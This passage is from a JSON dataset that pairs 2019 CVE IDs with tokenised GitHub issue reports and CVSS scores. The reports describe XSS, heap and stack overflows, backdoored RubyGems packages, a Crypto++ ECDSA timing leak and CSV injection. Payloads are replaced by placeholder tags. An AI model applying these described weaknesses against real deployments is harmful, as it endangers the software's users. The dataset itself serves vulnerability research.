  36941. "description": "Placeholder. Relates to: APITAG NUMBERTAG Full details to come shortly. Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
  36942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  36943. "severity": "MEDIUM",
  36944. "baseScore": 6.5,
  36945. "impactScore": 3.6,
  36946. "exploitabilityScore": 2.8
  36947. },
  36948. {
  36949. "CVE_ID": "CVE-2019-14271",
  36950. "Issue_Url_old": "https://github.com/moby/moby/issues/39449",
  36951. "Issue_Url_new": "https://github.com/moby/moby/issues/39449",
  36952. "Repo_new": "moby/moby",
  36953. "Issue_Created_At": "2019-07-01T23:53:44Z",
  36954. "description": "docker cp broken with debian containers (arm). Description docker cp is broken with Debian containers (on armhf). Steps to reproduce the issue NUMBERTAG install the latest docker NUMBERTAG on armhf NUMBERTAG APITAG NUMBERTAG APITAG Describe the results you received: ERRORTAG Describe the results you expected: Work. Additional information you deem important (e.g. issue happens only occasionally): This works fine with: Alpine (musl) APITAG This also works fine with Debian on D4M using NUMBERTAG RC2 Output of docker version : ERRORTAG Output of docker info : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): raspberry pi Either this is limited to armhf, or this is only in RC3 and not in RC2. MENTIONTAG also hinted at: URLTAG URLTAG",
  36955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36956. "severity": "CRITICAL",
  36957. "baseScore": 9.8,
  36958. "impactScore": 5.9,
  36959. "exploitabilityScore": 3.9
  36960. },
  36961. {
  36962. "CVE_ID": "CVE-2019-14281",
  36963. "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2072",
  36964. "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2072",
  36965. "Repo_new": "rubygems/rubygems.org",
  36966. "Issue_Created_At": "2019-07-23T21:52:37Z",
  36967. "description": "datagrid version NUMBERTAG is compromised and a malware, please yank!. Hi, datagrid version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported bootstrap sass malware! FILETAG URLTAG",
  36968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36969. "severity": "CRITICAL",
  36970. "baseScore": 9.8,
  36971. "impactScore": 5.9,
  36972. "exploitabilityScore": 3.9
  36973. },
  36974. {
  36975. "CVE_ID": "CVE-2019-14282",
  36976. "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2073",
  36977. "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2073",
  36978. "Repo_new": "rubygems/rubygems.org",
  36979. "Issue_Created_At": "2019-07-23T21:54:36Z",
  36980. "description": "simple_captcha2 version NUMBERTAG is compromised and a malware, please yank!. Hi, simple_captcha2 version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported bootstrap sass malware! It leaves a backdoor on the affected server. FILETAG URLTAG",
  36981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36982. "severity": "CRITICAL",
  36983. "baseScore": 9.8,
  36984. "impactScore": 5.9,
  36985. "exploitabilityScore": 3.9
  36986. },
  36987. {
  36988. "CVE_ID": "CVE-2019-14295",
  36989. "Issue_Url_old": "https://github.com/upx/upx/issues/286",
  36990. "Issue_Url_new": "https://github.com/upx/upx/issues/286",
  36991. "Repo_new": "upx/upx",
  36992. "Issue_Created_At": "2019-07-19T06:15:54Z",
  36993. "description": "Integer overflow in function APITAG at APITAG APITAG What's the problem (or question)? upx.out l APITAG /dev/null An issue was discovered in up NUMBERTAG There is a/an Integer overflow in function APITAG at APITAG In the add operation, the result of (p >sh_size + p >sh_offset) is equal to zero because of overflow. So the execution can pass the condition check on line NUMBERTAG and applicate excessive memory line NUMBERTAG resulting in denial of service. What should have happened? list compressed file Do you have an idea for a solution? check for integer overflow correctly How can we reproduce the issue? upx.out l APITAG /dev/null the poc is attached source ERRORTAG debug ERRORTAG bug report ERRORTAG Please tell us details about your environment. UPX version used ( APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz",
  36994. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36995. "severity": "MEDIUM",
  36996. "baseScore": 5.5,
  36997. "impactScore": 3.6,
  36998. "exploitabilityScore": 1.8
  36999. },
  37000. {
  37001. "CVE_ID": "CVE-2019-14296",
  37002. "Issue_Url_old": "https://github.com/upx/upx/issues/287",
  37003. "Issue_Url_new": "https://github.com/upx/upx/issues/287",
  37004. "Repo_new": "upx/upx",
  37005. "Issue_Created_At": "2019-07-19T06:25:38Z",
  37006. "description": "APITAG overflow. APITAG What's the problem (or question)? An issue was discovered in up NUMBERTAG There is a/an buffer overflow in function APITAG at APITAG upx.out l APITAG /dev/null What should have happened? list compressed file Do you have an idea for a solution? check for buffer overflow correctly How can we reproduce the issue? upx.out l APITAG /dev/null source ERRORTAG debug CODETAG bug report ERRORTAG Please tell us details about your environment. UPX version used ( APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz",
  37007. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37008. "severity": "HIGH",
  37009. "baseScore": 7.8,
  37010. "impactScore": 5.9,
  37011. "exploitabilityScore": 1.8
  37012. },
  37013. {
  37014. "CVE_ID": "CVE-2019-14315",
  37015. "Issue_Url_old": "https://github.com/sunhater/kcfinder/issues/180",
  37016. "Issue_Url_new": "https://github.com/sunhater/kcfinder/issues/180",
  37017. "Repo_new": "sunhater/kcfinder",
  37018. "Issue_Created_At": "2019-07-09T10:35:32Z",
  37019. "description": "Cross site Scripting Vulnerability. I discovered XSS vulnerability in kcfinder version NUMBERTAG test2. Payload > curl PATHTAG );} APITAG APITAG Response ERRORTAG Vulnerable code in file PATHTAG line NUMBERTAG ERRORTAG a var APITAG was not escape by APITAG",
  37020. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37021. "severity": "MEDIUM",
  37022. "baseScore": 6.1,
  37023. "impactScore": 2.7,
  37024. "exploitabilityScore": 2.8
  37025. },
  37026. {
  37027. "CVE_ID": "CVE-2019-14318",
  37028. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/869",
  37029. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/869",
  37030. "Repo_new": "weidai11/cryptopp",
  37031. "Issue_Created_At": "2019-07-26T04:49:09Z",
  37032. "description": "ECDSA timing leaks. From a private email by J\u00e1n Jan\u010d\u00e1r: > Message ID NUMBERTAG bd NUMBERTAG e NUMBERTAG e9 c NUMBERTAG EMAILTAG uni.cz> > Subject: Vulnerability disclosure > ... > > During our research into security of elliptic curve cryptography implementations on smart cards and in software libraries NUMBERTAG we have discovered timing leakage in the ECDSA signature generation in the Crypto++ library. > > Vulnerability description > > When performing ECDSA over binary field curves, Crypto++ leaks the bit length of the nonce used in scalar multiplication. It also leaks some other currently unknown information, see the attached plots, specifically the APITAG plot. > > This leakage can be abused if an attacker is able to measure the duration of signing of a few hundreds or thousands of known messages. The attacker can then use a lattice attack based on the Hidden Number Problem NUMBERTAG to reconstruct the private key used, as demonstrated in NUMBERTAG even remotely!). > > See the attached plots and heatmaps for details of the leakage on the standard sect NUMBERTAG r1 curve. based on the level of noise present in the attacker's measurements (the lattice attack is very sensitive to noise) and willingness to trade off computation time, the attack would require from NUMBERTAG to NUMBERTAG k signatures. > > The private key recovery itself, assuming a noise free set of just enough signatures, would then take a few minutes. The leakage is somewhat present in ECDSA over prime field curves as well, but much smaller, I do not know the cause of this NUMBERTAG APITAG URLTAG NUMBERTAG D. Boneh, R. Venkatesan: Hardness of computing the most significant bits of secret keys in Diffie Hellman and related schemes; FILETAG PATHTAG NUMBERTAG B. B. Brumley, N. Tuveri: Remote Timing Attacks are Still Practical; FILETAG >",
  37033. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  37034. "severity": "MEDIUM",
  37035. "baseScore": 5.9,
  37036. "impactScore": 3.6,
  37037. "exploitabilityScore": 2.2
  37038. },
  37039. {
  37040. "CVE_ID": "CVE-2019-14323",
  37041. "Issue_Url_old": "https://github.com/troglobit/ssdp-responder/issues/1",
  37042. "Issue_Url_new": "https://github.com/troglobit/ssdp-responder/issues/1",
  37043. "Repo_new": "troglobit/ssdp-responder",
  37044. "Issue_Created_At": "2019-07-23T18:26:42Z",
  37045. "description": "Stack based buffer overflow in ssdp_recv. SSDP responder (from version NUMBERTAG up to latest NUMBERTAG incorrectly handles incoming network messages leading to a stack based buffer overwrite by NUMBERTAG byte. This will result in crash of the server, but only when strict stack checking is enabled. Error message WITH Address Sanitizer: sudo ./ssdpd d ssdpd FILETAG",
  37046. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37047. "severity": "HIGH",
  37048. "baseScore": 7.5,
  37049. "impactScore": 3.6,
  37050. "exploitabilityScore": 3.9
  37051. },
  37052. {
  37053. "CVE_ID": "CVE-2019-14349",
  37054. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1358",
  37055. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1358",
  37056. "Repo_new": "espocrm/espocrm",
  37057. "Issue_Created_At": "2019-07-18T13:41:38Z",
  37058. "description": "Stored in XSS in filename. Description APITAG version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in functionality for storing documents in account tab. Attacker can upload specially crafted file, which contains javascript code in its name. Malicious javascript code will be executed when user open page of any profile there is a file with javascript in filename. But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite) Request ERRORTAG Vulnerable parameters APITAG and name APITAG APITAG",
  37059. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37060. "severity": "MEDIUM",
  37061. "baseScore": 6.1,
  37062. "impactScore": 2.7,
  37063. "exploitabilityScore": 2.8
  37064. },
  37065. {
  37066. "CVE_ID": "CVE-2019-14350",
  37067. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1356",
  37068. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1356",
  37069. "Repo_new": "espocrm/espocrm",
  37070. "Issue_Created_At": "2019-07-18T13:23:57Z",
  37071. "description": "Stored XSS in Knowledge base. Description Current version of APITAG NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in Knowledge base. Malicious attacker can inject APITAG code in the \"body\" parameter during knowledge base record creation. APITAG contains a link, which will execute javascript code after being clicked. APITAG Make the following request (insert your authentication data and hostname) CODETAG FILETAG",
  37072. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37073. "severity": "MEDIUM",
  37074. "baseScore": 6.1,
  37075. "impactScore": 2.7,
  37076. "exploitabilityScore": 2.8
  37077. },
  37078. {
  37079. "CVE_ID": "CVE-2019-14351",
  37080. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1357",
  37081. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1357",
  37082. "Repo_new": "espocrm/espocrm",
  37083. "Issue_Created_At": "2019-07-18T13:37:09Z",
  37084. "description": "User password hash enumeration. Description Current version of APITAG NUMBERTAG is vulnerable to user's password hash enumeration. Malicious authenticated attacker can bruteforce user password hash by NUMBERTAG symbol at a time using specially crafted filters. APITAG Make a following request in your browser: APITAG ` If user password hash starts with \"AAAA\" the request will result with information about this user, if not the result will be empty.",
  37085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  37086. "severity": "HIGH",
  37087. "baseScore": 8.8,
  37088. "impactScore": 5.9,
  37089. "exploitabilityScore": 2.8
  37090. },
  37091. {
  37092. "CVE_ID": "CVE-2019-14352",
  37093. "Issue_Url_old": "https://github.com/jogetworkflow/jw-community/issues/20",
  37094. "Issue_Url_new": "https://github.com/jogetworkflow/jw-community/issues/20",
  37095. "Repo_new": "jogetworkflow/jw-community",
  37096. "Issue_Created_At": "2019-07-15T23:08:14Z",
  37097. "description": "CSV Injection APITAG NUMBERTAG to High NUMBERTAG Description CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Details The web application embeds untrusted user input inside the CSV file. In this case a simple formula was used but an attacker can use a malicious formula that might download a file from the internet and have it executed to gain access. The following shows the CSV injection point: APITAG Download the CSV: APITAG Open the CSV file and observe the output: APITAG Impact When a spreadsheet program such as Microsoft Excel or APITAG Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVETAG Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website Exfiltrating contents from the spreadsheet, or other open spreadsheets. Recommendation This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters: Equals to (\"=\") Plus (\"+\") Minus (\" \") At (\" APITAG References URLTAG",
  37098. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37099. "severity": "HIGH",
  37100. "baseScore": 7.8,
  37101. "impactScore": 5.9,
  37102. "exploitabilityScore": 1.8
  37103. },
  37104. {
  37105. "CVE_ID": "CVE-2019-14368",
  37106. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/952",
  37107. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/952",
  37108. "Repo_new": "exiv2/exiv2",
  37109. "Issue_Created_At": "2019-07-12T02:22:41Z",
  37110. "description": "APITAG heap buffer overflow in APITAG Describe the bug in my research , a heap overflow found in APITAG To Reproduce exi NUMBERTAG pr $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
  37111. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37112. "severity": "HIGH",
  37113. "baseScore": 7.8,
  37114. "impactScore": 5.9,
  37115. "exploitabilityScore": 1.8
  37116. },
  37117. {
  37118. "CVE_ID": "CVE-2019-14369",
  37119. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/953",
  37120. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/953",
  37121. "Repo_new": "exiv2/exiv2",
  37122. "Issue_Created_At": "2019-07-12T03:07:03Z",
  37123. "description": "APITAG heap buffer overflow in APITAG APITAG Describe the bug in my research , a heap overflow found in APITAG APITAG APITAG To Reproduce exi NUMBERTAG pv $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
  37124. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37125. "severity": "MEDIUM",
  37126. "baseScore": 6.5,
  37127. "impactScore": 3.6,
  37128. "exploitabilityScore": 2.8
  37129. },
  37130. {
  37131. "CVE_ID": "CVE-2019-14370",
  37132. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/954",
  37133. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/954",
  37134. "Repo_new": "exiv2/exiv2",
  37135. "Issue_Created_At": "2019-07-12T06:36:56Z",
  37136. "description": "heap buffer overflow in APITAG APITAG . Describe the bug in my research , a heap overflow found in APITAG PATHTAG To Reproduce exi NUMBERTAG pv $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
  37137. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37138. "severity": "MEDIUM",
  37139. "baseScore": 6.5,
  37140. "impactScore": 3.6,
  37141. "exploitabilityScore": 2.8
  37142. },
  37143. {
  37144. "CVE_ID": "CVE-2019-14373",
  37145. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/541",
  37146. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/541",
  37147. "Repo_new": "flif-hub/flif",
  37148. "Issue_Created_At": "2019-07-22T02:04:00Z",
  37149. "description": "heap buffer overflow in png_set_text NUMBERTAG in my research in FLIF, a crafted file can cause a heap overflow in libpng. I wonder whether the bug is in FLIF or in libpng. flif overwrite d $poc FILETAG FILETAG asan output ERRORTAG",
  37150. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37151. "severity": "HIGH",
  37152. "baseScore": 7.8,
  37153. "impactScore": 5.9,
  37154. "exploitabilityScore": 1.8
  37155. },
  37156. {
  37157. "CVE_ID": "CVE-2019-14379",
  37158. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2387",
  37159. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2387",
  37160. "Repo_new": "fasterxml/jackson-databind",
  37161. "Issue_Created_At": "2019-07-23T06:28:01Z",
  37162. "description": "A new gadget to exploit the default typing issue in jackson-databind. Hey, buddy. I found a new gadget that can be used to exploit jackson and cause an RCE vulnerability. I have sent the report to EMAILTAG .",
  37163. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37164. "severity": "CRITICAL",
  37165. "baseScore": 9.8,
  37166. "impactScore": 5.9,
  37167. "exploitabilityScore": 3.9
  37168. },
  37169. {
  37170. "CVE_ID": "CVE-2019-14431",
  37171. "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/30",
  37172. "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/30",
  37173. "Repo_new": "matrixssl/matrixssl",
  37174. "Issue_Created_At": "2019-07-23T16:50:11Z",
  37175. "description": "Heap based buffer overflow while parsing DTLS messages APITAG APITAG DTLS server (in all publicly released versions including NUMBERTAG OPEN) incorrectly handles incoming network messages leading to heap buffer overwrite up to NUMBERTAG bytes and possible Remote Code Execution. After processing crafted packet server incorrectly handles fragment length value provided in DTLS message. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: matrixssl NUMBERTAG open$ PATHTAG p NUMBERTAG DTLS server running on port NUMBERTAG Select woke NUMBERTAG Got REQUEST_RECV from APITAG Error in PATHTAG APITAG memory corruption NUMBERTAG cde0 ======= Backtrace: ========= PATHTAG NUMBERTAG e5) FILETAG",
  37176. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37177. "severity": "CRITICAL",
  37178. "baseScore": 9.8,
  37179. "impactScore": 5.9,
  37180. "exploitabilityScore": 3.9
  37181. },
  37182. {
  37183. "CVE_ID": "CVE-2019-14439",
  37184. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2389",
  37185. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2389",
  37186. "Repo_new": "fasterxml/jackson-databind",
  37187. "Issue_Created_At": "2019-07-24T18:19:41Z",
  37188. "description": "Placeholder for another \"default typing\" CVE. Another report arrived, wrt logback/JNDI. Need to file a CVE, probably block.",
  37189. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  37190. "severity": "HIGH",
  37191. "baseScore": 7.5,
  37192. "impactScore": 3.6,
  37193. "exploitabilityScore": 3.9
  37194. },
  37195. {
  37196. "CVE_ID": "CVE-2019-14459",
  37197. "Issue_Url_old": "https://github.com/phaag/nfdump/issues/171",
  37198. "Issue_Url_new": "https://github.com/phaag/nfdump/issues/171",
  37199. "Repo_new": "phaag/nfdump",
  37200. "Issue_Created_At": "2019-07-07T08:29:49Z",
  37201. "description": "Integer overflow in APITAG (ipfix.c) . Hi! I found an integer overflow at function APITAG that can be abused in order to crash the process remotely (denial of service): CODETAG The function uses APITAG as uint NUMBERTAG t which is an unsigned integer (it can only hold values between NUMBERTAG and NUMBERTAG so if we have a APITAG with value NUMBERTAG when the subtraction at line NUMBERTAG is done ( APITAG ), it will overflow and become NUMBERTAG fffffffd). As this is a value higher than NUMBERTAG the size check made at line NUMBERTAG APITAG ) will be bypassed. At this point we have a huge loop ( APITAG ) where the pointer APITAG will be increased by NUMBERTAG in each iteration until it reaches an invalid memory address and segfaults. I hope this information can be useful. Best regards, Juan Manuel Fernandez",
  37202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37203. "severity": "HIGH",
  37204. "baseScore": 7.5,
  37205. "impactScore": 3.6,
  37206. "exploitabilityScore": 3.9
  37207. },
  37208. {
  37209. "CVE_ID": "CVE-2019-14464",
  37210. "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/184",
  37211. "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/184",
  37212. "Repo_new": "milkytracker/milkytracker",
  37213. "Issue_Created_At": "2019-07-30T16:54:00Z",
  37214. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in APITAG L ERRORTAG . Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37215. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37216. "severity": "MEDIUM",
  37217. "baseScore": 5.5,
  37218. "impactScore": 3.6,
  37219. "exploitabilityScore": 1.8
  37220. },
  37221. {
  37222. "CVE_ID": "CVE-2019-14465",
  37223. "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/198",
  37224. "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/198",
  37225. "Repo_new": "schismtracker/schismtracker",
  37226. "Issue_Created_At": "2019-07-30T20:06:50Z",
  37227. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing Schism Tracker with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in mtm.c L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37228. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37229. "severity": "HIGH",
  37230. "baseScore": 7.8,
  37231. "impactScore": 5.9,
  37232. "exploitabilityScore": 1.8
  37233. },
  37234. {
  37235. "CVE_ID": "CVE-2019-14491",
  37236. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15125",
  37237. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15125",
  37238. "Repo_new": "opencv/opencv",
  37239. "Issue_Created_At": "2019-07-23T03:32:04Z",
  37240. "description": "out of bounds read in function APITAG . APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler => clang NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG there is an out of bounds read in function APITAG in APITAG which leads to denial of service. source CODETAG debug CODETAG bug report ERRORTAG others from fuzz project pwd opencv classifier NUMBERTAG crash name FILETAG Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. Steps to reproduce commandline classifier PATHTAG APITAG FILETAG",
  37241. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  37242. "severity": "HIGH",
  37243. "baseScore": 8.2,
  37244. "impactScore": 4.2,
  37245. "exploitabilityScore": 3.9
  37246. },
  37247. {
  37248. "CVE_ID": "CVE-2019-14492",
  37249. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15124",
  37250. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15124",
  37251. "Repo_new": "opencv/opencv",
  37252. "Issue_Created_At": "2019-07-23T03:20:37Z",
  37253. "description": "out of bounds read/write in Function APITAG APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => :ubuntu NUMBERTAG LTS: Compiler => : clang NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG there is an out of bounds read/write in Function APITAG in APITAG which leads to denial of service. src CODETAG debug CODETAG Steps to reproduce APITAG FILETAG",
  37254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37255. "severity": "HIGH",
  37256. "baseScore": 7.5,
  37257. "impactScore": 3.6,
  37258. "exploitabilityScore": 3.9
  37259. },
  37260. {
  37261. "CVE_ID": "CVE-2019-14493",
  37262. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15127",
  37263. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15127",
  37264. "Repo_new": "opencv/opencv",
  37265. "Issue_Created_At": "2019-07-23T03:36:46Z",
  37266. "description": "null pointer dereference in function APITAG . APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler => clang NUMBERTAG Detailed description description An issue was discovered in openc NUMBERTAG There is a null pointer dereference in function APITAG at APITAG NUMBERTAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd opencv classifier NUMBERTAG crash name FILETAG Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. Steps to reproduce commandline classifier PATHTAG APITAG FILETAG",
  37267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37268. "severity": "HIGH",
  37269. "baseScore": 7.5,
  37270. "impactScore": 3.6,
  37271. "exploitabilityScore": 3.9
  37272. },
  37273. {
  37274. "CVE_ID": "CVE-2019-14496",
  37275. "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/183",
  37276. "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/183",
  37277. "Repo_new": "milkytracker/milkytracker",
  37278. "Issue_Created_At": "2019-07-29T18:09:01Z",
  37279. "description": "Stack based buffer overflow in the APITAG function. Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a stack based buffer overflow in APITAG in APITAG L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37280. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37281. "severity": "HIGH",
  37282. "baseScore": 7.8,
  37283. "impactScore": 5.9,
  37284. "exploitabilityScore": 1.8
  37285. },
  37286. {
  37287. "CVE_ID": "CVE-2019-14497",
  37288. "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/182",
  37289. "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/182",
  37290. "Repo_new": "milkytracker/milkytracker",
  37291. "Issue_Created_At": "2019-07-29T18:06:21Z",
  37292. "description": "Stack based buffer overflow in APITAG Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a stack based buffer overflow in APITAG in APITAG L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37293. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37294. "severity": "HIGH",
  37295. "baseScore": 7.8,
  37296. "impactScore": 5.9,
  37297. "exploitabilityScore": 1.8
  37298. },
  37299. {
  37300. "CVE_ID": "CVE-2019-14517",
  37301. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/709",
  37302. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/709",
  37303. "Repo_new": "pandao/editor.md",
  37304. "Issue_Created_At": "2019-07-22T13:23:07Z",
  37305. "description": "XSS Vulnerability in APITAG label. Test Environment Google Chrome Version NUMBERTAG APITAG Build NUMBERTAG bit) Description A malicious actor may insert and finally execute malicious Javascript code. Steps to reproduce NUMBERTAG Go to FILETAG or any open FILETAG apps NUMBERTAG In the edit mode, input the following malicious code snippet: APITAG Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Expected Results No malicious Javascript code should be executed Remediation In general, it is highly recommended to implement input validation, output sanitization and escaping. Proof of Concept FILETAG",
  37306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37307. "severity": "MEDIUM",
  37308. "baseScore": 6.1,
  37309. "impactScore": 2.7,
  37310. "exploitabilityScore": 2.8
  37311. },
  37312. {
  37313. "CVE_ID": "CVE-2019-14518",
  37314. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1041",
  37315. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1041",
  37316. "Repo_new": "evolution-cms/evolution",
  37317. "Issue_Created_At": "2019-03-22T14:11:43Z",
